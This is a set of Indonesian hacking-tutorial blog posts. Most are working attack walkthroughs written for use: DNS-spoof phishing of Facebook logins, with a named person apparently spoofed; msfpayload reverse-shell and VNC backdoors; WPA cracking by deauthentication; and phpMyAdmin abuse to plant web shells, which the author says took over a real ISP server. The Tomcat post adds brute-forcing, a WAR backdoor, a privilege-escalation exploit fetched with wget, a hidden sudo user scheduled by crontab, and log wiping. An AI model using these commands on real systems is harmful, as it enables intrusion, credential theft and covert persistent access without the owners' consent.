DHCP: [192.168.1.1] ACK : 192.168.1.6 255.255.255.0 GW 192.168.1.1 DNS 8.8.8.8 “”
dns_spoof: [www.facebook.com] spoofed to [192.168.1.6]
Upz lagi spoofed om mirwan aka cassprodigy kena spoof kwwkkw.. maap2 om .. langsung ganti aja dah passwordnya
Kalau sudah pastinya jika korban membuka url facebook.com maka akan di redirect ke 192.168.1.6 dan menemukan login palsu kemudian akan memasukan user name berikut password..yang nantinya akan di rekam di file zeeganteng.txt
Ok sampai di sini dulu berhubung ane mau siap2 buat seminar besok.. nanti saya update lagi cara untuk menangkal dan menghindari serangan phissing ini..ok see u again ..
Source : Om Zee
Diposting oleh ethical code di 20.02 0 komentar
Remote paksa kompi target
Sebelum
kita membahasa tentang tehnik mendapatkan akses remote vlc via
metasploit … sebaiknya teman-teman membaca ini postingan ini terlebih
dahulu [..http://zeestuff.wordpress.com/2011/05/08/remote-windows-dengan-backdoor-exe/ ] karena postingan ini merupakan sambungan dari postingan tersebut.
Seperti pada postingan saya yang lalu mengenai remote windows dengan
backdoor.exe kita sudah mendapatkan akses shell komputer target… Jadi
anggapan saya anda telah berhasil pada tutorial saya yang pertama dan
telah mendapatkan akses shell target dengan mengunakan NC ( netcat )
dalam hal ini saya spesifisikan sebagai berikut :
komputer penyerang
- ip addr : 192.168.1.34
- os : backtrack R2
komputer target
- ip addr : 192.168.1.33
- os windows xp sp2
Diakesnya shell via netcat akan membuka kita untuk mengakses komputer korban
ikuti langkah-langkah berikut ini
root@IBTeam:~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.34 LPORT=2482 x > /tmp/zee-ganteng.exe
ket : windows/vncinject/reverse_tcp —- payload yang di gunakan
LHOST = isikan ip anda
LPORT = isikan port yang memungkinkan ..
/tmp = direktori di mana kita akan mengesave backdoor …
mengapa di /tmp ? .. ya karena kita akan menggunakan fasilitas tftp ( default directory tftpd )
zee-ganteng.exe — nama backdoor , bisa gunakan nama sesuai kreasi ente
backdoor sudah tercipta
Seep tahap persiapan telah anda lewati .. sekarang mari kita exploitasi lebih lanjut.. . Pindahkan file backdoor yang barusan kita buat tadi ( zee-ganteng.exe ) ke komputer target . Dengan ap ? ya dengan TFTPD service .
aktifkan dengan
menu —–> service —–> TFTPD —–> TFTPD —–> start TFTPD
Sekarang anda mengerti kenapa saya memilih directory /tmp untuk mensave backdoor .. ya karena home directory TFTPD secara default berada di sana… Lanjut kang
Untuk memindahkan backdoor tersebut bukanlah hal yang sulit ..
Pada shell windows tadi ketikan perintah :
tftp -i 192.168.1.34 GET /tmp/zee-ganteng.exe
Ok udah sukses perjalanan kita sampai di sini hehehe… sudah saatnya kita action sekarang … buka kembali shell pada tab baru .. masuk ke metasploit
root@IBTeam~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.34 RPORT=2428 DisabledCourtesySHell=true Ewindows/vncinject/reverse_tcpwindows/vncinject/reverse_tcp
Nah tinggal kita jalankan saja file backdoor reverse_tcp tadi
Perintah agar runnig hanya dengan menuliskan file yang hendak di esekusi terus enter.. perhatikan gambar di atas.
Setelah backdoor tersebut berhasil di aktifkan … we have the vnc server active
Bagi temen2 yang kurang jelas dengna tutorial ini. Silahkan mendownload video tutorial yang udah ane buat … just for share.. long live open source
video link :
http://www.ziddu.com/download/14923691/vnc.rar.html
watch online :
http://blip.tv/file/5128068
Source : Om Zee
Diposting oleh ethical code di 20.00 1 komentar
Cracking enskripsi wireless wpa – wpa2 dengan cowpatty
1. Cek Support Interface
2.MODE MONITOR
(monitor mode enabled on mon0)
root@nindya-putri:~# airodump-ng mon0
a. bssid AP = 00:1E:C1:4C:BF:F8
b. channel = 11
c. ENC = WPA
d. SSID = ibteam-3g
4. AIRODUMP-NG
root@nindya-putri:~# airodump-ng --bssid 00:1E:C1:4C:BF:F8 -w dump_traf1 -c 11 mon0
5. Handshake
root@nindya-putri:~# aireplay-ng --deauth 1 -a 00:1E:C1:4C:BF:F8 -c F4:EC:38:99:60:F3 mon0
6. cowpatty action
root@nindya-putri:~# genpmk -f pass.txt -d tes_genpmk_hash_wpa -s ibteam-3g -v
cowpatty -s ibteam-3g -f pass.txt -d tes_genpmk_hash_wpa -r dump_traf1-01.cap -v,
dimana parameternya -s ( ssid AP target ) -f ( lokasi file password list dictionary ) -d ( hasil hashing password list dictionary dengan genpmk ) -r ( hasil capturing handshadke dengan airdump ) -v ( verbose output )
Source : Om Zee
Diposting oleh ethical code di 19.57 0 komentar
akibat kelalaian dari aplikasi phpmyadmin
Akibat
dari kelalaian aplikasi phpmyadmin yang tidak di password atau
terinstall secara asal-asalan ternyata fatal .. kali ini ane posting
mengenai bagaimana modus seorang attacker dalam melakukan penyisupan
dengan memanfaatkan kelemahan aplikasi phpmyadmin
Apa itu phpmyadmin ? setahu saya phpmyadmin adalah aplikasi yang di
gunakan dalam pengoperasian mysql melalui web environment. Karena memang
pengoperasian mysql dari command line masih tergolong sulit. Ok coba
ane bahas kronologis akibat dari hal ini.
1. Target yang memiliki kelemahan dalam aplikasi phpmyadmin
Begitu saya membuka url target .. hupfftt ternyata phpmyadminnya
terbuka… ya saya lanjutkan dengan mengexploitasi…kenapa langsung
terbuka? karena secara default phpmyadmin terinstall tanpa menggunakan
password .. username:root password:no biasanya hal ini terjadi ketika
windows user menginstall xampp secara default.
Kemudian saya coba buat database baru dengan nama tes.. kemungkinan
nalar saya mengatakan bahwa sang admin gk akan curiga dengan database
bernama tes.. karena saya sendiri sering membuat database dengan nama
seperti itu untuk melakukan testing database pada phpmyadmin
2. Mengetahui dengan pasti aplikasi webserver yang di gunakan target. ( INFORMATION GATHERING )
Aplikasi webserver kan bermacam-macam .. sesuai dengan
operatingsystem yang dipakai.. sebut saja apache, nginx yang biasanya
ada pada sistem linux dan xampp yang berada pada sistem windows.. untuk
mengetahui dengan pasti aplikasi yang di pakai biasanya attacker akan
mencari tau aplikasi yang dipakai. Pada kasus ini saya tinggal membuka
halaman index dan terlihat xampp secara default
Hmm terlihat jelas sekali bahwa sistem operasi yang di pakai ada
windows dan aplikasi web server yang dipakai adalah xampp. Pada kasus
yang berbeda nntinya anda tinggal akan mengganti lokasi-lokasi dir
default dari berbagai aplikasi web server.
3. Mengesekusi query untuk membuat file upload
Nah seperti yang kita tau , mysql memiliki beberapa perintah-perintah
dalam bentuk query atau sql syntax, nah dengan memanfaatkan kesempatan
tersebut, attacker akan membuat sebuah perintah-perintah query dengan
tujuan tertentu
caranya ?
Saya masuk ke database “test” yang baru saja saya buat kemudian saya buka sql dan memasukan query-query di bawah ini
use mysql; DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values (' Upload file :'); SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab; DROP TABLE temptab; FLUSH LOGS;Perintah di atas sebenarnya bertujuan untuk membuat file bernama form.php yang nntinya digunakan attacker untuk meupload file backdoor. Perhatikan sytax html pada form dengan action=”upload.php” yup tebakan anda benar … kita harus membuat file upload.phpnya yang menjadi esekutor.
Kita ulangi kembali langkah tadi kemudian masukan query di bawah ini untuk membuat file upload.php
use mysql; DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo " ";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print " ";?>'); SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab; DROP TABLE temptab; FLUSH LOGS;Tinggal neken tombol “GO” nah sebenarnya dilihat dari perintah maka kita akan membuat file tersebut didalam direktori web default xampp yaitu “c:/xampp/htdocs/” dan dengan kedua query tadi attacker telah membuat 2 file dalam dir c:/xampp/htdocs/ yaitu “form.php” dan “upload.php”
4. Upload file backdoor ( EXPLOITATION )
Kemudian attacker tinggal membuka file form.php untuk mengupload file berikutnya… karena di upload pada direktori utama pada xampp di dir “htdocs” maka attacker tinggal membuka url http://situstarget/form.php
yup dari sini sudah di buka form upload di mana anda dapat melakukan langkah selanjutnya. Ane mencoba mengupload file backdoor.php modipan om james0baster yang dikenal dengan nama 404.php…ternyata berhasil.
yup sejauh ini anda sudah menjadi “admin” karena dilihat dari informasi yang di hasilkan 404.php anda berprivilage admin.. mengingat memang windows menginstall xamp lewat privilage admin
Apakah attacker akan berhenti sampai disini ? tentu saja tidak .. attacker akan berusaha untuk mendapatkan akses lebih dalam lagi .. dalam hal ini sangat dimungkinkan mesin disusupi remote backdoor.
5. REMOTE BACKDOOR ( MAINTAINING ACCESS )
Ok seperti yang saya bilang attacker tidak akan puas sebelum anda benar2 terOWNED !!! karena itu saya coba buat backdoor dengan menggunakan fasilitas payload
root@eichel:~# msfpayload windows/shell/reverse_tcp LHOST=1xx.xxx.xxx.xxx x > /tmp/zee.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: {"LHOST"=>"1xx.xxx.xxx.xxx"} root@eichel:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1xx.xxx.xxx.xxx x > /tmp/susan.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"1xx.xxx.xxx.xxx"}
hehehe backdoor bernama “susan” sudah siap digunakan. Backdoor tersebut kemudian saya upload lewat shell 404.php tadi ..
Tinggal saya jalankan metasploit listernernya di backtrack saya
Kemudian attacker akan mengesekusi file remote backdoor melalui shell. Dalam kasus ini saya mencoba esekusi file susan,exe melalui backdoor 404.php
Dan meterpreterpun terbuka.. sebenarnya ini termasuk dari tehnik penyerangan melalui NAT yang sering ditanya2 di forum.. hanya dengan ip publik vs ip publik kita bisa melakukan hal ini.
jiahh kita lihat proses berjalan pada server target …
Dilihat dari prosesnya ada 2 antivirus sedang berjalan .. hmmm
1280 DefWatch.exe x86 0 C:\Program Files\Symantec AntiVirus\DefWatch.exe 1308 explorer.exe x86 0 ADMIN\Admin C:\WINDOWS\Explorer.EXE 1316 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1336 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe 1340 hkcmd.exe x86 0 ADMIN\Admin C:\WINDOWS\system32\hkcmd.exe 1364 postgres.exe x86 0 C:\Program Files\PostgreSQL\9.0\bin\postgres.exe 1400 YahooAUService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe 1520 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1552 pds.exe x86 0 C:\WINDOWS\system32\CBA\pds.exe 1584 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 1672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1684 igfxpers.exe x86 0 ADMIN\Admin C:\WINDOWS\system32\igfxpers.exe 1708 SM?RTP.exe x86 0 ADMIN\Admin C:\Program Files\Smadav\SM?RTP.exeTernyata antivirusnya kyknya gk diupdate atau bajakan ?.. hanya ALLAH yang tau !
Adanya proses yahoo messangger membuat saya penasaran .. siapa tau bisa liat2 percakapn gitu hahaha.. akhirnya saya melakukan migrating ke proses explorer.exe yaitu pada pid 1308 kemudian melakukan vnc backdoor injection
dan remote-desktop melalui vnc stagger pun terbuka …dan saya bahkan dapat mengontrol / meremote desktop server target dari jauh !!
Ternyata server yang kita pentest barusan itu adalah server ISP ( internet service provide ) yang membagi-bagi bandwidth .. semoga admin dari perusahaan tersebut melihat postingan ini kemudian memperbaiki celah tersebut…:P
Langkah terakhir saya mencoba memasuki cmd shell dari server tersebut ..
Ok server ini ter-owned sepenuhnya …
Pelajaran yang harus kita tarik bersama dari postingan ini
1. Hati-hati terhadap aplikasi phpmyadmin anda .. pastikan berpassword.. kalau perlu tidak menggunakan aplikasi2 tersebut .. gunakan command line .. ingat akan SBL-CL! and say no to GUI !
2. Wahai engkau pengguna windus,… bertobatlah dan gunakan windows asli serta berbagai aplikasi asli. Karena biar bagaimanapun Allah tidak ridho kepada para pembajak dan pencuri !! mau make aplikasi dan os mudah .. tapi gk mau keluar modal..!!! LINUX ADA UNTUK MENJAWAB MASALAH ANDA DAN MENGHINDARKAN ANDA DARI DOSA PEMBAJAKAN.. aminnnn…
saya zee eichel mohon undur diri dari hadapan anda …
Source : Om ZEE
Diposting oleh ethical code di 19.54 0 komentar
TOMCAT ternyata memang berbahaya… bahkan bisa menusuk jiwa …
dari
judulnya ane rasa memang sangat menarik, betapa kita tau beberapa waktu
ini , Indonesia di kejutkan dengan adanya tomcat. Serangga yang mampu
memberikan rasa melepuh terhadap kulit manusia. Ok ternyata tomcat
seperti ini juga terdapat di dalam dunia IT. vulnerability yang sangat
berbahaya .. Pada kesempatan ini ane mau membahas sebuah simulasi
hacking yang ane beri judul ..
“TOMCAT DEADLY BITE”
PRESIMULATION
= apa itu tomcat ?
tomcat adalah web server yang didevelop oleh apache group. Biasanya
tomcat di install berpasangan dengan web server apache untuk di jadikan
web proxy.
Ok spesifikasi simulasi ini
1. Information gathering
2. Bruteforcing
3. Backdooring ( exploitation )
4. Privilage Escalation
5. Maintaining access
Ok kita mulai saja
1. Information gathering
Untuk mengumpulkan informasi kita gunakan nmap.. kali ini saya mencoba untuk melakukan nmap untuk melihat berapa host yang upkarena sebagai simulator tentunya saya sudah mempersiapkan target… kali ini target kita ada ip 192.168.1.6 berbasis sistem ubuntu server
perhatikan pada baris
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Sudah terlihat server target memiliki service apache tomcat running di port 8080…
2. Bruteforcing
Pada dasarnya tomcat memiliki halaman administrator yang akan memungkinkan kita mengakses panel adminnya. untuk itu saya gunakan metode bruteforcing untuk mendapat akses tersebut. Kali ini saya pakai medusa. Artikel tentang bruteforcing medusa sudah banyak saya bahas.Karena medusa membutuhkan user.list dan pass.list maka saya telah membuatnya terlebih dahulu …
root@eichel:~# cat usertomcat tes test admin money administrator dodol admin1 admin123 admin1234 root@eichel:~# cat passwordtomcat test tes monkey manager admin manager command tes1 admin123ok berbasis dua file tersebut saya mencoba melakukan bruteforcing …dengan asumsi
(-M) modul = http (-h) host, ip atau nama (-U) usename.lst ( kamus ) (-P) password.lst ( kamus ) (-e ns) [n] =coba tanpa password, [s] kemungkinan password = username (-n) port (-m) direktori path ( manager/html adalah default admin page dari tomcat )
dari sekian banyak percobaan ternyata salah satu sukses..
ok kita dapatkan sukses pada user : admin dan pass : admin
kita buka di browser 192.168.1.6:8080
kemudian masuk ke 192.168.1.6:8080/manager/html masukan user:pass = admin:admin
ok anda berhasil memasuki panel admin tomcat.
3. Backdooring ( exploitation )
Langkah selanjutnya attacker akan membuat trigered payload untuk membuat koneksi ke shell target. Hmm tujuan agar kita dapat mengekusi langkah selanjut dengan mulus dan perlu memasuki system korban walau hanya dengan user non aktif. Dalam hal ini saya memakai metasploitingat tadi seperti yang kita tahu bersama bahwa sistem target menggunakan linux x86 karena itu payload saya atur ke linux x86 dengan LHOST = ip attacker ( 192.168.1.10 ) dan menggunakan port 4545 untuk membangun bind connection reverse tcp
PREPARING FOR LISTENER
ok kita buka msfconsole kita kemudian menggunakan exploit/multi/handler dengan opsi-opsi yang dicocokan dengan backdoor.war yang telah kita buat pada langkah sebelumnya …
hmm pastikan opsi – opsi sudah benar …
saatnya kita jalankan listener …
UPLOAD BACKDOOR.WAR INTO THE TARGET DIRECTORY
sekarang kita akan mengupload kenadeh.war yang telah kita buat dengan msfpayload tadi .. ok pada panel admin tomcat server target anda sudah seharusnya melihat adanya form upload dengan ekstensi war file. ok kita upload dari dir kita menuju ke dir target. pilih file yang hendak di upload kemudian klik deploy..
jika kita berhasil menguploadnya, war file adalah file ekstrakan seperti halnya zip, rar , dll. sistem tomcat dengan otomatis akan mengekstrak file war dalam hal ini “kenadeh.war” sehingga akan terbentuk sebuah direktori “kenadeh“. Dalam tomcat ini disebut sebagai istilah “deploy“
Seperti yang sudah saya jelaskan sebelumnya bahwasanya file war itu adalah file archive.. karena itu kita harus tau nama backdoor triggering yang sebenarnya. Adabaiknya kita ekstrak di host kita terlebih dahulu sehingga kita tahu kita harus memanggil file dengan nama apa.
root@eichel:~# unzip kenadeh.war Archive: kenadeh.war inflating: META-INF/MANIFEST.MF inflating: WEB-INF/web.xml inflating: cazyptnwpvlazb.jsp inflating: CBMazgyh.txthmm perhatikan file dengan ekstensi jsp. disitulah anda akan memanggil backdoor anda… kita tidak perlu mengekstrak file war di server target.. ingat tomcat telah melakukan ekstrak secara otomatis.. karena itu sudah dipastikan file cazyptnwpvlazb.jsp telah berada pada direktori tomcat dan siap diesekusi.
Kehebatan backdoor ini adalah tidak perlu adanya social enggineering karena backdoor tidak perlu diesekusi oleh user sistem target. group nobody/world pun sanggup memicu backdoor. sehingga attacker akan memicu backdoor tersebut dengan mengakses url backdoor maka attacker tidak perlu menunggu lama untuk membuka shell aktif..
http://192.168.1.6:8080/kenadeh/cazyptnwpvlazb.jsp
shell pun terbuka
4. Privilage Escalation
kita ketik “shell” untuk mengakses cmd server… ok sekarang dengan perintah id saya tau bahwa saya menggunakan akses user tomcat , dan gid = tomcat.
okey terlihat gambar di atas bahwa informasi kernel sudah kita dapatkan ,
uname -a Linux ubuntu 2.6.35-02063504-generic #201008271919 SMP Fri Aug 27 20:27:22 UTC 2010 i686 GNU/LinuxUntuk mempermudah sya dalam mengeksploitasi maka saya teringat akan postingan om ekawithoutyou mengenai spawning bash pada http://forum.indonesianbacktrack.or.id/showthread.php?tid=2108 yang memungkinkan kita mengaktifkan /bin/bash atau bin/sh. Saya lebih senang dengan bin/bash heheheh
ok dilihat dari kernelnya tampaknya exploit kernel tersebut sangat mudah untuk didapatkan …kita tinggal harus mengupload backdoor tersebut, karenanya saya mencoba mencari direktori yang writetable untuk user tomcat ini..
Kemudian attacker tinggal mengupload exploit dengan fasilitas ‘wget‘
Sperti pada gambar di atas. attacker mengupload exploit kemudian menambahkan +x pada permission sehingga file tersebut sudah siap di jalankan. Exploit yang di upload ada baiknya sudah di compilasi dari script.c Mengingat tidak semua server memiliki gcc yang terinstall. Sehingga exploit kali ini sudah di kompilasi terlebih dahulu dari script c.
Kemudian attacker hanya tinggal mengesekusi file tersebut …
dan holaaa id=root gid=root ..
5. Maintaining access
Biasanya attacker akan berusaha untuk tidak meninggalkan jejak serta mengecoh sysadmin kemudian membuat dirinya sebuah akses tertentu untuk memasuki system tersebut di lain waktu …Dalam hal ini saya memberikan sebuah contoh yang dulu sering saya lakukan ketika berhasil melakukan rooting. saya memanfaatkan crontab atau sebuah sistem task yang otomatis berjalan yang dapat ditentukan kapan sistem akan mengesekusinya. Kalau pada sistem windows kita sering mendengar automatic task. Saya akan membuat sebuah script.sh penambahan user.. hmm sebelumnya saya akan mencari tau kira-kira group-group apakah yang memiliki akses sudoers…
root@ubuntu:/var/lib/tomcat6/shared# cat /etc/sudoers cat /etc/sudoers ... #includedir /etc/sudoers.d # Members of the admin group may gain root privileges %admin ALL=(ALL) ALL ... root@ubuntu:/var/lib/tomcat6/shared#Ok dilihat dari keterangan pada /etc/sudoers bahwa grou admin adalah group yang memiliki hak “sudoers” , bermodal ini saya akan membuat system.sh untuk keperluan maintaining akses. Attacker biasanya akan memilih dir-dir yang sulit dideteksi .. dan membuat dir tersebut tersamar .. karena itu saya membuat sebuah dir di dalam /etc/perl/CPAN
root@ubuntu:cd /etc/perl/CPAN root@ubuntu:/etc/perl/CPAN#
hmm setelah kita cukup membuat sebuah direktori yang sulit di deteksi .. saya membuat sebuah 2 buah file script.sh
isinya adalah sebagai berikut …yang pertama saya beri nama auth.sh
useradd admin -G admin -p saOhMg4WOk7iY -d /etc/perl/CPAN/.../.../ -s /bin/bashsebenarnya isinya simple kok .. yaitu membuat user admin di bawah group sudoers admin dan berhomebase pada /etc/perl/CPAN/…/…/ tipe shell adalah /bin/bash. mungkin anda bertanya dari mana saya dapet ‘saOhMg4WOk7iY‘ itu enskripsi salt agar kita dapat langsung memberi user buatan kita password dalam satu perintah …cara dapetnya
root@eichel:~# perl -e 'print crypt("150787", "salt"),"\n"' saOhMg4WOk7iYyang kedua kita beri nama antifor.sh
isinya adalah
#/bin/bash rm -rf /var/log/auth.log touch /var/log/auth.log userdel adminhmm saya kreasikan dengan menghapus /var/log/auth.log dimana tiap otentifikasi user-user tercatat disana. kemudian membuat auth.log baru serta menghapus user admin. Kedua script tersebut akan kita jadwalkan pada crontab sistem target.
kita buat file crontab yang nntinya akan kita imput kedalam kita beri nama crontab
01 23 1,7,14,21 1-12 * /etc/perl/CPAN/.../..././auth.sh 01 0 2,8,15,22 1-12 * /etc/perl/CPAN/.../..././antifor.shfile crontab itu menunjukan bahwa sistem secara otomatis akan mengesekusi file auth.sh tiap menit pertama pada jam 23 ( 11 malam ) dan berlaku pada tanggal 1,7,14,21 setiap bulan. baris dua cuma ane bedakan 1 hari sehingga anda tau bahwa user anda siap tiap tanggal tanggal 1,7,14,21 karena besoknya secara otomatis sistem akan menghapus user tersebut. Hal ini akan mengecoh sisadmin sehingga jika sisadmin lengah maka attacker terus mendapatkan akses masuk ssh dengan user privilage sudoers
ok , kita upload semua file tersebut ke dir yang telah kita buat…kebetulan ketiga file telah saya zip
root@ubuntu:/etc/perl/CPAN/.../...# wget http://192.168.1.10/auth.zip wget http://192.168.1.10/auth.zip --2012-04-12 12:47:38-- http://192.168.1.10/auth.zip Connecting to 192.168.1.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 852 [application/zip] Saving to: `auth.zip' 100%[======================================>] 852 --.-K/s in 0s 2012-04-12 12:47:39 (51.8 MB/s) - `auth.zip' saved [852/852]Kemudian jgn lupa untuk men-chmod 777 ke seluruh file
langkah terakhir kita aktifkan crontab buatan kita :p
selamat anda telah berhasil melakukan tahap maintaining access …ketika pada waktunya user anda akan aktif ..
root@eichel:~# ssh admin@192.168.1.6 admin@192.168.1.6's password: Added user admin.
tambahan : waktu crontab bisa anda modif.. ya sesuai kebutuhan lah.. siapa tau demi mengkamuflase admin anda menjadwalkan user anda aktif dalam waktu 1 bulan satu kali.
CLEAR LOG
yang perlu di perhatikan disini adalah
1.log tomcat root@ubuntu:/var/log/tomcat6# ls ls catalina.2012-04-11.log catalina.out localhost.2012-04-12.log catalina.2012-04-12.log localhost.2012-04-11.log root@ubuntu:/var/log/tomcat6# cat localhost.2012-04-12.log cat localhost.2012-04-12.log Apr 12, 2012 7:04:26 AM org.apache.catalina.core.ApplicationContext log --- INFO: HTMLManager: undeploy: Undeploying web application at '/kenadeh' ---ok semoga tutorial ini berguna bagi teman-teman semua… akhir kata saya undur diri dari hadapan anda .. salam backtrackers…
Source : Om Zee
Diposting oleh ethical code di 19.53 0 komentar